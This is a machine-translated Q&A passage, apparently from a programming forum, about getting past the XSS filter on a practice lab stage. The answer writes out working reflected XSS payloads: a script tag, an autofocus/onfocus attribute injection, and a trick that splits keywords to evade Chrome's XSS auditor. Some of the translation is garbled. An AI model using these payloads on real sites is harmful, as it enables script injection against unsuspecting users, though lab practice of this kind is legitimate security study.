2017-03-27 12 views
0

にはどうすればXSSフィルタをバイパスし、このページに警告をポップアップ表示することができますバイパスXSSフィルタ

http://leettime.net/xsslab1/stage--08.php

スクリプトがために、それは不可能にサーバー側での単一引用符( ')をフィルタリングするように見えます私は値のフィールドに注入する。

<input type="text" name="name" value=''></input> 

このページでは、XSSのテストシリーズの一部ですので、私は何らかの形で警告をポップアップ表示することが可能であることを確信しているが、私はちょうど方法がわかりません。

答えて

0

名前を入力して[送信]をクリックします。 URLの2つのパラメータを見ることができるように、フォームはGETリクエストによって送信されます。両方ともHTMLレスポンスに反映されます。

名=スポンジ&は、代わりにを提出上の名前パラメータ焦点=

<font size=3>Enter Your Name here : <input type="text" name="name" value='spongebob'></input> 
<input type="submit" name="submit" value=""> 

を提出します。フィルタリングされない二重引用符で囲まれています。文字>が削除されているので、タグを閉じることができないので、タグの内部に注入が行われなければなりません。 >剥ぎ取られる:

名=スポンジボブ&提出=%22%3E%3Cscript%3Ealert(document.URL)%の3C /スクリプトは%3E

<input type="submit" name="submit" value=""<scriptalert(document.URL)</script"> 

それはONFOCUSを組み合わせることにより、自動的にJavaScriptを実行することが可能ですオートフォーカス。

名=スポンジボブ&提出=%22%20autofocus%20onfocus =%22alert(document.URL)

<input type="submit" name="submit" value="" autofocus onfocus="(document.URL)"> 

この

はなく、ChromeでFirefoxで自動的に実行されます作業XSSであるChromeのXSS監査理由XSSが反射していることを検出します。 Chromeは提出パラメータがHTMLに反映されていることを検出することはできませんので、

Chrome XSS auditor reports that 'Token contains a reflecte XSS vector'

それでは、私たちに有利に「>」のサーバー側のフィルタリングを使用してみましょう。

名=スポンジ&は= "%の20auto>注力%20onf> ocus =" 警告(DOC> ument.URL)

Chrome XSS auditor bypassed using because of server side filtering

を提出します
0

私は間違っていました。タスクを完了するために注入できる追加のフォームフィールドがあります。